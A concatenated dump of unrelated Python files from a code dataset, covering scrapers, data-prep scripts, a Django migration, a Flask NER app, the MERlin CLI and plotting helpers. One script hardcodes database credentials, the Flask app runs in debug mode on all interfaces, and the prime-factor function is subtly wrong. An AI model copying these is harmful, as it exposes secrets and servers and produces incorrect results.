Font_Size:\n if(most_iterate_size_value'):\n Normalized_Feat.append(-1)\n else:\n class_is = feat['prevtag']\n itemindex = np.where(segmnetation_values == class_is)\n Normalized_Feat.append(itemindex[0][0])\n\n copyof_x_data.append(Normalized_Feat.copy())\n return copyof_x_data\n\ndef prepareDataForTraining(data):\n x_data = []\n y_data = []\n for resume in data:\n for pharagraph_num in data[resume]:\n x_data.append(sentenceFeaturesExtraction(data[resume][pharagraph_num][0:-1], pharagraph_num, x_data, y_data))\n y_data.append(data[resume][pharagraph_num][-1])\n X = numericDataX(x_data, y_data)\n Y = numericDataY(y_data)\n return X,Y\n\n","sub_path":"src/SegementerClassifier.py","file_name":"SegementerClassifier.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80069331","text":"\"\"\"This file is a TMP spider created on top of the ATSSpider\nscrapy crawl tmp_nonsearch -a mining_job_id=9999 -a iteration=1 -a url=\"http://jobs.asmnet.com/\" -a extract=1\n\nsample url:\n http://jobs.asmnet.com/\n http://wellstarjobs.org/\n http://jobs.kfc.com/\n http://concentra.tbjobsearch.com/\n http://searchskyjobs.com/\n http://jobs.bd.com/\n\"\"\"\nfrom urlparse import urljoin\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.spiders.tmp import TMP\n\n\nclass TMP_NONSEARCH(TMP):\n\n name = \"tmp_nonsearch\"\n\n # Added a blocked domain to the list of allowed_domains\n allowed_domains = [\"jobsatnovanthealth.org\"]\n jobs_seen = set()\n\n def parse(self, response):\n sel = Selector(response)\n\n for cat in sel.xpath('//ul[@name=\"locations_list_link\"]/li/a/@href').extract():\n yield Request(\n url=urljoin(response.url, cat),\n callback=self.parse_page,\n meta={'locationurl': cat.replace('/', '')}\n )\n\n def parse_page(self, response):\n self.set_meta_language(response)\n sel = Selector(response)\n jobs = sel.xpath('//table[@class=\"info-table\"]//tr[descendant::a[not(contains(@href,\"jobs/job-list\"))]][not(descendant::input)]')\n next_page = sel.xpath(\"//a[@id='jobs_next_page_link']/@href\")\n\n currentpage = response.meta.get('currentpage', 1)\n\n yielded_job = False\n\n for job in jobs:\n if not job.xpath('.//a[not(contains(@href, \"javascript\"))]/@href'):\n continue\n url = urljoin(response.url, job.xpath(\".//a/@href\").extract()[0])\n location = ''.join(job.xpath(\"td[2]/text()\").extract())\n request = Request(url, callback=self.parse_job_callback())\n request.meta['locationurl'] = response.meta['locationurl']\n request.meta['location'] = location\n request.meta['title'] = job.xpath(\".//a/text()\").extract()[0]\n yielded_job = True\n yield request\n\n if next_page and yielded_job:\n url = urljoin(response.url, '/%s/job-list-%s' % (response.meta['locationurl'], currentpage+1))\n yield Request(\n url=url,\n callback=self.parse_page,\n meta={'currentpage': currentpage+1, 'locationurl': response.meta['locationurl']}\n )\n\n def parse_job(self, response):\n sel = Selector(response)\n\n if sel.xpath('//table[@class=\"info-table\"]'):\n for request in self.parse_page(response):\n request.meta['locationurl'] = response.meta['locationurl']\n yield request\n else:\n items = super(TMP_NONSEARCH, self).parse_job(response)\n for item in items:\n if item['referencenumber'] not in self.jobs_seen:\n self.jobs_seen.add(item['referencenumber'])\n yield item\n","sub_path":"brightcorp/brightcorp/spiders/tmp_nonsearch.py","file_name":"tmp_nonsearch.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"86631690","text":"#\n# Pyserini: Python interface to the Anserini IR toolkit built on Lucene\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport json\nimport os\nimport argparse\n\ndef generate_queries_and_qrels(args):\n queries = {}\n with open(args.dataset_file, 'r', encoding='utf-8') as f_in:\n # open qrels file if provided\n if args.output_qrels_file:\n print('Generating qrels...')\n qrels_out = open(args.output_qrels_file, 'w', encoding='utf-8')\n\n # open labels file if provided\n if args.output_labels_file:\n print('Generating labels...')\n labels_out = open(args.output_labels_file, 'w', encoding='utf-8')\n\n for line in f_in:\n line_json = json.loads(line.strip())\n qid = line_json['id']\n query = line_json['claim']\n if 'label' in line_json: # no \"label\" field in test datasets\n label = line_json['label']\n\n # save query to queries dict\n queries[qid] = query\n if label == 'NOT ENOUGH INFO':\n continue\n\n # write claims and evidence to qrels file if provided\n if args.output_qrels_file:\n # dedupe evidences for the query\n evidences = set()\n for annotator in line_json['evidence']:\n for evidence in annotator:\n if args.granularity == 'sentence':\n evidences.add((evidence[2], evidence[3]))\n else: # args.granularity == 'paragraph'\n evidences.add(evidence[2])\n\n # write deduped evidences to qrels file\n if args.granularity == 'sentence':\n for doc_id, sentence_id in evidences:\n qrels_out.write(f'{qid}\\t0\\t{doc_id}_{sentence_id}\\t2\\n')\n else: # args.granularity == 'paragraph'\n for doc_id in evidences:\n qrels_out.write(f'{qid}\\t0\\t{doc_id}\\t2\\n')\n\n # write claims and labels to labels file if provided\n if args.output_labels_file:\n score = 1 if label == 'SUPPORTS' else 0\n labels_out.write(f'{qid}\\t{score}\\n')\n\n # close qrels file if provided\n if args.output_qrels_file:\n qrels_out.close()\n\n # close labels file if provided\n if args.output_labels_file:\n labels_out.close()\n\n # write queries to queries file if provided\n if args.output_queries_file:\n print('Generating queries...')\n with open(args.output_queries_file, 'w', encoding='utf-8') as f_out:\n for qid, query in queries.items():\n f_out.write(f'{qid}\\t{query}\\n')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Generates queries and qrels files from a FEVER dataset file.')\n parser.add_argument('--dataset_file', required=True, help='Path to FEVER dataset file.')\n parser.add_argument('--output_queries_file', help='Output queries file.')\n parser.add_argument('--output_qrels_file', help='Output qrels file.')\n parser.add_argument('--output_labels_file', help='Output labels file.')\n parser.add_argument('--granularity',\n required=True,\n choices=['paragraph', 'sentence'],\n help='The granularity of the source documents to index. Either \"paragraph\" or \"sentence\".')\n args = parser.parse_args()\n\n if not args.output_queries_file and not args.output_qrels_file:\n print('Please provide at least one of --output_queries_file or --output_qrels_file.')\n exit()\n\n if args.output_queries_file and not os.path.exists(os.path.dirname(args.output_queries_file)):\n os.makedirs(os.path.dirname(args.output_queries_file))\n if args.output_qrels_file and not os.path.exists(os.path.dirname(args.output_qrels_file)):\n os.makedirs(os.path.dirname(args.output_qrels_file))\n\n generate_queries_and_qrels(args)\n\n print('Done!')\n","sub_path":"src/main/python/fever/generate_queries_and_qrels.py","file_name":"generate_queries_and_qrels.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311624095","text":"import mysql.connector\nimport platform,os,sys\n\n\nwin= 'win' in platform.system().lower()\n\ndtfile=\"\"\ndivDir=\"\"\nscriptDir=os.path.dirname(sys.argv[0])\nif win:\n dtfile='c:/code/bizd.txt'\n divDir=os.path.dirname(sys.argv[0])+\"/div\"\nelse:\n dtfile='bizd.txt'\n divDir='/home/NSJ/data/ind'\n# mysql1.py\nconfig = {\n 'host': '10.189.66.33',\n 'user': 'wdy',\n 'password': '123456',\n 'port': 3306,\n 'database': 'NSJ',\n 'charset': 'utf8'\n}\nconn = mysql.connector.connect(**config)\ncursor = conn.cursor()\n\n\n\ndata=list()\nwith open(f\"{scriptDir}/beta.csv\",\"r\",encoding=\"utf-8\") as f:\n for i in f.readlines():\n i=i.strip()\n print(i)\n xx=i.split(',')\n\n xx[0]=int(xx[0])\n xx[5]=int(xx[5])\n xx[6]=int(xx[6])\n xx[4]=float(xx[4])\n data.append(tuple(xx))\n\n#today,cls,ind,sym,result[cls][ind][sym]]\nsql = \"insert into industryBeta (dataDate,classify,industry,symbol,beta,betaRank,betaCount) values (%s,%s,%s,%s,%s,%s,%s)\"\n#cursor.execute(sql,data[0])\ntry:\n cursor.executemany(sql,tuple(data))\nexcept Exception as e:\n print(\"执行MySQL: %s 时出错:%s\" % (sql, e))\n\nconn.commit()\ncursor.close()\nconn.close()\n","sub_path":"ind/test_gs.py","file_name":"test_gs.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596267225","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('portfolio', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.SlugField(unique=True, max_length=255)),\n ('project_url', models.URLField(verbose_name=b'Project_URL')),\n ('description', models.TextField(blank=True)),\n ('disciplines', models.CharField(max_length=250)),\n ('completion_date', models.DateField()),\n ('in_development', models.BooleanField(default=False)),\n ('is_public', models.BooleanField(default=True)),\n ('overview_image', models.URLField()),\n ('detail_image', models.URLField()),\n ('client', models.ForeignKey(to='portfolio.Client')),\n ('media', models.ManyToManyField(to='portfolio.Media')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='projects',\n name='client',\n ),\n migrations.RemoveField(\n model_name='projects',\n name='media',\n ),\n migrations.DeleteModel(\n name='Projects',\n ),\n ]\n","sub_path":"portfolio/migrations/0002_auto_20141126_1928.py","file_name":"0002_auto_20141126_1928.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415823060","text":"from kivy.app import App\nfrom kivy.uix.label import Label\n\n\nclass TestApp(App):\n def build(self):\n root_widget = Label(text=\"It is fun to program\", font_size=80)\n root_widget.bind(on_touch_down=self.change)\n return root_widget\n\n def change(self, instance, touch):\n if instance.text == \"Programming is fun\":\n instance.text = \"It is fun to program\"\n else:\n instance.text = \"Programming is fun\"\n\n\nmy_app = TestApp()\nmy_app.run()\n","sub_path":"SUTD_DW/11_week/cohort_1.py","file_name":"cohort_1.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260949843","text":"\"\"\"Main entry point for the MERlin pipeline.\"\"\"\nimport argparse\nimport json\nimport sys\nfrom pathlib import Path\nfrom typing import TextIO\n\nimport snakemake\n\nimport merlin\nfrom merlin.core import executor\nfrom merlin.core.dataset import MERFISHDataSet\nfrom merlin.util import snakewriter\n\n\ndef build_parser() -> argparse.ArgumentParser:\n \"\"\"Create the command-line argument parser.\"\"\"\n parser = argparse.ArgumentParser(description=\"Decode MERFISH data.\")\n\n parser.add_argument(\n \"--generate-only\",\n action=\"store_true\",\n help=\"only generate the directory structure and do not run any analysis.\",\n )\n parser.add_argument(\n \"--configure\",\n action=\"store_true\",\n help=\"configure MERlin environment by specifying data, analysis, and parameters directories.\",\n )\n parser.add_argument(\"dataset\", help=\"directory where the raw data is stored\")\n parser.add_argument(\"-a\", \"--analysis-parameters\", help=\"name of the analysis parameters file to use\")\n parser.add_argument(\"-o\", \"--data-organization\", help=\"name of the data organization file to use\")\n parser.add_argument(\"-c\", \"--codebook\", nargs=\"+\", help=\"name of the codebook to use\")\n parser.add_argument(\"-m\", \"--microscope-parameters\", help=\"name of the microscope parameters to use\")\n parser.add_argument(\"-p\", \"--positions\", help=\"name of the position file to use\")\n parser.add_argument(\"-n\", \"--core-count\", type=int, help=\"number of cores to use for the analysis\")\n parser.add_argument(\"--check-done\", action=\"store_true\", help=\"flag to only check if the analysis task is done\")\n parser.add_argument(\n \"-t\",\n \"--analysis-task\",\n help=\"the name of the analysis task to execute. If no analysis task is provided, all tasks are executed.\",\n )\n parser.add_argument(\n \"-i\", \"--fragment-index\", default=\"\", help=\"the index of the fragment of the analysis task to execute\"\n )\n parser.add_argument(\"-e\", \"--data-home\", help=\"the data home directory\")\n parser.add_argument(\"-s\", \"--analysis-home\", help=\"the analysis home directory\")\n parser.add_argument(\"-k\", \"--snakemake-parameters\", help=\"the name of the snakemake parameters file\")\n parser.add_argument(\"-f\", \"--fovs\", help=\"filename containing list of FOVs to process\")\n parser.add_argument(\"--skip\", nargs=\"+\", help=\"list of FOV names to omit from processing\")\n parser.add_argument(\"--profile\", action=\"store_true\", help=\"profile tasks and dump to logs\")\n parser.add_argument(\"--suffix\", help=\"Suffix to add to the analysis output directory name\")\n\n return parser\n\n\ndef clean_string_arg(string: str) -> str | None:\n \"\"\"Remove any single or double quotes around string.\"\"\"\n return None if string is None else string.strip(\"'\").strip('\"')\n\n\ndef get_optional_path(string: str) -> Path | None:\n string = clean_string_arg(string)\n return Path(string) if string is not None else None\n\n\ndef get_input_path(prompt: str) -> str:\n \"\"\"Ask user to provide a directory.\"\"\"\n while True:\n path = str(input(prompt))\n if not path.startswith(\"s3://\") and not Path(path).expanduser().exists():\n print(f\"Directory {path} does not exist. Please enter a valid path.\")\n else:\n return path\n\n\ndef configure_environment() -> None:\n \"\"\"Create the merlin environment file by prompting the user.\"\"\"\n data_home = get_input_path(\"DATA_HOME=\")\n analysis_home = get_input_path(\"ANALYSIS_HOME=\")\n parameters_home = get_input_path(\"PARAMETERS_HOME=\")\n merlin.store_env(data_home, analysis_home, parameters_home)\n\n\ndef run_merlin() -> None:\n \"\"\"Run the MERlin pipeline.\"\"\"\n parser = build_parser()\n args, _ = parser.parse_known_args()\n\n if not args.analysis_task:\n print(\"MERlin - the MERFISH decoding pipeline\")\n\n if args.configure:\n print(\"Configuring MERlin environment\")\n configure_environment()\n return\n\n dataset = MERFISHDataSet(\n args.dataset,\n dataOrganizationName=get_optional_path(args.data_organization),\n codebookNames=args.codebook,\n microscopeParametersName=get_optional_path(args.microscope_parameters),\n positionFileName=get_optional_path(args.positions),\n dataHome=get_optional_path(args.data_home),\n analysisHome=get_optional_path(args.analysis_home),\n fovList=get_optional_path(args.fovs),\n profile=args.profile,\n skip=args.skip,\n analysis_suffix=args.suffix\n )\n\n parameters_home = merlin.ANALYSIS_PARAMETERS_HOME\n # e = executor.LocalExecutor(coreCount=args.core_count)\n snakefile_path = None\n if args.analysis_parameters:\n # This is run in all cases that analysis parameters are provided\n # so that new analysis tasks are generated to match the new parameters\n with Path(parameters_home, args.analysis_parameters).open() as f:\n snakefile_path = generate_analysis_tasks_and_snakefile(dataset, f)\n\n if not args.generate_only:\n if args.analysis_task:\n task = dataset.load_analysis_task(args.analysis_task, args.fragment_index)\n if args.check_done:\n # checking completion creates the .done file for parallel tasks\n # where completion has not yet been checked\n if task.is_complete():\n print(f\"Task {args.analysis_task} is complete\")\n else:\n print(f\"Task {args.analysis_task} is not complete\")\n else:\n task.run()\n elif snakefile_path:\n snakemake_parameters = {}\n if args.snakemake_parameters:\n with Path(merlin.SNAKEMAKE_PARAMETERS_HOME, args.snakemake_parameters).open() as f:\n snakemake_parameters = json.load(f)\n\n run_with_snakemake(dataset, snakefile_path, args.core_count, snakemake_parameters)\n\n\ndef generate_analysis_tasks_and_snakefile(dataset: MERFISHDataSet, parameters_file: TextIO) -> str:\n \"\"\"Create the snakemake workflow file for the given dataset and parameters.\"\"\"\n print(f\"Generating analysis tasks from {parameters_file.name}\")\n analysis_parameters = json.load(parameters_file)\n generator = snakewriter.SnakefileGenerator(analysis_parameters, dataset, sys.executable)\n snakefile_path = generator.generate_workflow()\n print(f\"Snakefile generated at {snakefile_path}\")\n return snakefile_path\n\n\ndef run_with_snakemake(dataset: MERFISHDataSet, snakefile_path: Path, cores: int, snakefile_parameters: dict) -> None:\n \"\"\"Run the snakemake workflow.\"\"\"\n print(\"Running MERlin pipeline through snakemake\")\n snakemake.snakemake(\n snakefile_path,\n cores=cores,\n workdir=dataset.get_snakemake_path(),\n stats=snakefile_path.with_suffix(\".stats\"),\n lock=False,\n keepgoing=True,\n **snakefile_parameters,\n )\n","sub_path":"merlin/merlin.py","file_name":"merlin.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485214167","text":"import math\n\n### Returns a list of numbers that contains the \n### prime factors of a given number\ndef primeFactors(n):\n prime_factors = []\n\n # divide all the 2's out first\n while n % 2 == 0:\n prime_factors.append(2)\n n = n / 2\n\n # now n should be an odd number so we iterate at 2\n # and find all the numbers less than sqrt(n)\n # that can be evenly divide n\n for i in range(3, int(math.sqrt(n)), 2):\n while n % i == 0:\n prime_factors.append(int(i))\n n = n / i\n\n # at the end, if n is a prime and greater than 2\n # add n into the list\n if n > 2:\n prime_factors.append(int(n))\n\n return prime_factors\n\nn = int(input())\nprint(primeFactors(n))","sub_path":"algorithms/primeFactors.py","file_name":"primeFactors.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"593191364","text":"import numpy as np\nimport pickle\nfrom tqdm import tqdm\nfrom features import Features\nfrom model_train import Model_Train\nimport yaml\nfrom sklearn.svm.classes import SVC\nfrom sklearn.model_selection import ParameterGrid\nimport sys\nfrom sklearn.metrics.pairwise import laplacian_kernel, chi2_kernel\n\nfeature_types = ['l_surf', 'l_cnn', 'l_asr', 'l_mfcc', 'l_soundnet']\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print (\"Usage: {0} config_file\".format(sys.argv[0]))\n print (\"config_file -- yaml filepath containing all parameters\")\n exit(1)\n config_file = sys.argv[1]\n my_params = yaml.load(open(config_file))\n train_list = my_params.get('train')\n val_list = my_params.get('val')\n test_list = my_params.get('test')\n later_fusion_repeat = int(my_params.get('later_fusion_repeat'))\n later_fusion_features = {}\n for j in range(later_fusion_repeat):\n late_fusion = np.zeros((2935, 1))\n\n for f_t in feature_types:\n with open('../best/' + f_t + '_best_' + str(j) + '.pkl', 'rb') as f:\n model = pickle.load(f)\n for i in range(3):\n vector = np.concatenate((model.train_result[i].reshape(-1, 1), model.val_result[i].reshape(-1, 1)), axis=0)\n vector = np.concatenate((vector, model.test_result[i].reshape(-1, 1)), axis=0)\n late_fusion = np.concatenate((late_fusion, vector), axis=1)\n\n late_fusion = late_fusion[:, 1:]\n \n files = [train_list, val_list, test_list]\n base = 0\n tracker = 0\n for lst in files:\n with open(lst, 'r') as f:\n for i, line in enumerate(f.readlines()):\n name = line.replace('\\n','').split(' ')[0]\n if name in later_fusion_features.keys():\n later_fusion_features[name] = np.concatenate((later_fusion_features[name], late_fusion[i + base].reshape(1, -1)), axis=1)\n else:\n later_fusion_features[name] = late_fusion[i + base].reshape(1, -1)\n tracker = i+base\n base = tracker+1\n\n with open('../../features/later_fusion_features.pkl', 'wb') as f:\n pickle.dump(later_fusion_features, f)\n\n\n\n ","sub_path":"hw3_code/scripts/create_later_fusion_features.py","file_name":"create_later_fusion_features.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610195389","text":"\"\"\"\nA module for setting matplotlib foreground and background colors (can do\nwhite-on-black)\n\nFrom:\nhttps://gist.github.com/jasonmc/1160951\n\"\"\"\n\n\ndef set_foregroundcolor(ax, color):\n '''For the specified axes, sets the color of the frame, major ticks,\n tick labels, axis labels, title and legend\n '''\n for tl in (ax.get_xticklines() + ax.get_yticklines()\n + ax.xaxis.get_minorticklines()\n + ax.yaxis.get_minorticklines()):\n tl.set_color(color)\n for spine in ax.spines:\n ax.spines[spine].set_edgecolor(color)\n for tick in ax.xaxis.get_major_ticks():\n tick.label1.set_color(color)\n for tick in ax.xaxis.get_minor_ticks():\n tick.label1.set_color(color)\n for tick in ax.yaxis.get_major_ticks():\n tick.label1.set_color(color)\n ax.axes.xaxis.label.set_color(color)\n ax.axes.yaxis.label.set_color(color)\n ax.axes.xaxis.get_offset_text().set_color(color)\n ax.axes.yaxis.get_offset_text().set_color(color)\n ax.axes.title.set_color(color)\n lh = ax.get_legend()\n if lh is not None:\n lh.get_title().set_color(color)\n lh.legendPatch.set_edgecolor('none')\n labels = lh.get_texts()\n for lab in labels:\n lab.set_color(color)\n for tl in ax.get_xticklabels():\n tl.set_color(color)\n for tl in ax.get_yticklabels():\n tl.set_color(color)\n\n\ndef set_backgroundcolor(ax, color):\n '''Sets the background color of the current axes (and legend).\n Use 'None' (with quotes) for transparent. To get transparent\n background on saved figures, use:\n pp.savefig(\"fig1.svg\", transparent=True)\n '''\n ax.patch.set_facecolor(color)\n lh = ax.get_legend()\n if lh is not None:\n lh.legendPatch.set_facecolor(color)\n","sub_path":"setcolor.py","file_name":"setcolor.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131039595","text":"from flask import Flask, render_template, request\nfrom bert import Ner\n\nmodel = Ner(\"out/\")\napp = Flask(__name__)\napp.jinja_env.filters['zip'] = zip\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/process', methods=[\"POST\"])\ndef process():\n if request.method == 'POST':\n rawtext = request.form['rawtext']\n output = model.predict(rawtext)\n entities = []\n tags = []\n scores = []\n print(output)\n for word, tag in output.items():\n if tag['tag'] != 'O':\n entities.append(word)\n tags.append(tag['tag'])\n scores.append(tag['confidence'])\n return render_template(\"index.html\", entities=entities, tags=tags, scores=scores, num_of_results=len(entities), text=rawtext)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"230593897","text":"import optparse\nimport os\nimport sys\nimport textwrap\nimport time\n\nimport objc\n\nfrom . import parsing, storage, xcode\n\nopt_parser = optparse.OptionParser()\nopt_parser.add_option(\n \"-f\",\n \"--framework\",\n dest=\"framework\",\n help=\"parse framework FRAMEWORK\",\n metavar=\"FRAMEWORK\",\n)\nopt_parser.add_option(\n \"--start-header\",\n dest=\"start_header\",\n help=\"use '#import
' to load the framework\",\n metavar=\"HEADER\",\n)\nopt_parser.add_option(\n \"--sdk-root\", dest=\"sdk_root\", help=\"Use the given SDK\", metavar=\"DIR\", default=\"/\"\n)\nopt_parser.add_option(\n \"--arch\",\n dest=\"arch\",\n help=\"Use the given processor architecture\",\n metavar=\"ARCH\",\n default=\"x86_64\",\n)\nopt_parser.add_option(\n \"-o\",\n \"--output-file\",\n dest=\"output\",\n help=\"Write results to the file\",\n metavar=\"FILE\",\n)\nopt_parser.add_option(\n \"-e\",\n \"--exceptions-file\",\n dest=\"exceptions\",\n help=\"Write exceptions to the file\",\n metavar=\"FILE\",\n)\nopt_parser.add_option(\n \"--pre-header\",\n dest=\"preheaders\",\n default=[],\n action=\"append\",\n help=\"Include header before including framework headers\",\n metavar=\"HEADER\",\n)\nopt_parser.add_option(\n \"--extra-header\",\n dest=\"extraheaders\",\n default=[],\n action=\"append\",\n help=\"Include header after including the main framework header\",\n metavar=\"HEADER\",\n)\n\n\ndef merge_meth_info(current, update):\n for a in update.get(\"args\", ()):\n if a not in current.get(\"args\", ()):\n if \"args\" not in current:\n current[\"args\"] = {}\n current[\"args\"][a] = update[\"args\"][a]\n else:\n current[\"args\"][a].update(update[\"args\"][a])\n if \"retval\" in update:\n if \"retval\" in current:\n current[\"retval\"].update(update[\"retval\"])\n else:\n current[\"retval\"] = update[\"retval\"]\n\n\ndef locate_method(lst, sel):\n for item in lst:\n if item[\"selector\"] == sel:\n return item\n return None\n\n\ndef locate_property(lst, name):\n for item in lst:\n if item[\"name\"] == name:\n return item\n return None\n\n\ndef merge_exceptions(current, updates):\n return\n for funcname, funcdata in updates[\"definitions\"][\"functions\"].items():\n if funcname not in current[\"definitions\"]:\n current[\"definitions\"][\"functions\"][funcname] = funcdata\n\n else:\n merge_meth_info(\n current[\"definitions\"][\"functions\"][funcname], updates[funcdata]\n )\n\n for section in (\"formal_protocols\", \"informal_protocols\", \"classes\"):\n for nm, info in updates[\"definitions\"][section].items():\n if nm not in current[\"definitions\"][section]:\n current[\"definitions\"][section][nm] = info\n else:\n for meth in info.get(\"methods\", ()):\n m = locate_method(\n current[\"definitions\"][section][nm][\"methods\"], meth[\"selector\"]\n )\n if m is None:\n current[\"definitions\"][section][nm][\"methods\"].append(meth)\n else:\n merge_meth_info(m, meth)\n\n for prop in info.get(\"properties\", ()):\n m = locate_property(\n current[\"definitions\"][section][nm][\"properties\"], prop[\"name\"]\n )\n if m is None:\n current[\"definitions\"][section][nm][\"properties\"].append(prop)\n else:\n m.update(prop)\n\n return current\n\n\ndef scan_headers(\n raw_fn,\n exceptions_fn,\n framework,\n start_header,\n preheaders,\n extraheaders,\n sdk_root,\n arch,\n link_framework,\n only_headers,\n # typemap,\n min_deploy,\n verbose=False,\n):\n if start_header is None:\n path = os.path.join(\n sdk_root, \"System\", \"Library\", \"Frameworks\", framework + \".framework\"\n )\n if os.path.exists(path):\n file_archs = xcode.archs_for_framework(path)\n\n else:\n path = objc.dyld_framework(\"Headers\", framework)\n file_archs = xcode.archs_for_framework(path)\n\n if arch not in file_archs:\n print(\n \"Framework %r not available for arch %r\" % (framework, arch),\n file=sys.stderr,\n )\n sys.exit(1)\n\n path = os.path.join(path, \"Headers\")\n if not os.path.exists(path):\n print(f\"Framework without headers {path!r}\", file=sys.stderr)\n sys.exit(1)\n\n files = os.listdir(path)\n if len(files) == 1:\n start_header = \"%s/%s\" % (framework, files[0])\n\n else:\n if framework + \".h\" not in files:\n print(\n \"Framework doesn't have a central header <%s/%s.h>\"\n % (framework, framework),\n file=sys.stderr,\n )\n sys.exit(1)\n\n prs = parsing.FrameworkParser(\n framework,\n start_header=start_header,\n sdk=sdk_root,\n arch=arch,\n preheaders=preheaders,\n extraheaders=extraheaders,\n link_framework=link_framework,\n only_headers=only_headers,\n # typemap=typemap,\n min_deploy=min_deploy,\n verbose=verbose,\n )\n\n prs.parse()\n\n if not os.path.exists(os.path.dirname(raw_fn)):\n os.makedirs(os.path.dirname(raw_fn))\n\n cur_time = time.ctime()\n storage.save_framework_info(\n raw_fn,\n textwrap.dedent(\n \"\"\"\\\n // GENERATED FILE DO NOT EDIT\n //\n // This file was generated by objective.metadata\n // Last update: %s\n \"\"\"\n )\n % (cur_time,),\n prs.definitions(),\n )\n\n new_exceptions = prs.exceptions\n if os.path.exists(exceptions_fn):\n cur_exceptions = storage.load_framework_info(exceptions_fn, verbose=verbose)\n new_exceptions = merge_exceptions(cur_exceptions, new_exceptions)\n\n storage.save_framework_info(\n exceptions_fn,\n textwrap.dedent(\n \"\"\"\\\n // objective.metadata exceptions file, see its document\n // for information on how to update this file.\n \"\"\"\n ),\n new_exceptions,\n verbose=verbose,\n )\n","sub_path":"objective/metadata/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"533785909","text":"#!/bin/python\n\"\"\"\n Create a nonuniformity map\n ~~~~~~~~~~~~~~~~~~~~~~\n\n :author: Xu Hangkun (许杭锟)\n :copyright: © 2020 Xu Hangkun \n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport ROOT\nimport argparse\nimport pickle\nimport sys\nsys.path.append(\"/dybfs/users/xuhangkun/SimTAO/offline\")\nfrom TaoDataAPI import TAOData\nfrom math import sqrt,pow\n\nparser = argparse.ArgumentParser(description=\"create the true nonlinearity map\")\nparser.add_argument(\"--input_dir\",default=\"../change_data/nonuniformity/electron_1MeV\")\nparser.add_argument(\"--output\",default=\"./data/result/true_nonuniformity.root\")\nargs = parser.parse_args()\n\ngr = ROOT.TGraph2D()\nn_point=0\nscale = 1.\nfor i in range(11):\n for j in range(13):\n print(\"e_theta%d_r%d.root\"%(9*i,50*j))\n filename=os.path.join(args.input_dir,\"e_theta%d_r%d.root\"%(9*i,50*j))\n data = TAOData([filename])\n hist = ROOT.TH1F(\"hist_%d_%d\"%(i,j),\"hist\",100,3500,5500)\n for k in range(data.GetEntries()):\n data.GetEntry(k)\n edep = data.GetAttr(\"fGdLSEdep\")\n hit = data.GetAttr(\"fNSiPMHit\")\n if edep < 0.999:\n continue\n hist.Fill(hit)\n hist.Fit(\"gaus\")\n if i == 0 and j == 0:\n scale = hist.GetFunction(\"gaus\").GetParameter(1)\n value = hist.GetFunction(\"gaus\").GetParameter(1)/scale\n gr.SetPoint(n_point,9*i,50*j,value)\n n_point += 1\n\nrfile = ROOT.TFile(args.output,\"recreate\")\ngr.Write()\nrfile.Close()\n","sub_path":"SourceDesign/create_true_nu_map.py","file_name":"create_true_nu_map.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"394677698","text":"import sys\n\nstdin = sys.stdin\n\nni = lambda: int(ns())\nna = lambda: list(map(int, ns().split()))\nns = lambda: stdin.readline()\n\na, b = na()\n\nans = 0\nif (a > 0 and a < 10) and (b > 0 and b < 10):\n ans = a * b\nelse:\n ans = -1 \n\nprint(ans)\n","sub_path":"abc/abc144/abc144_a.py","file_name":"abc144_a.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"261428072","text":"import pathlib\nimport random\n\nfrom typing import List, Optional, Tuple\n\n\nCell = 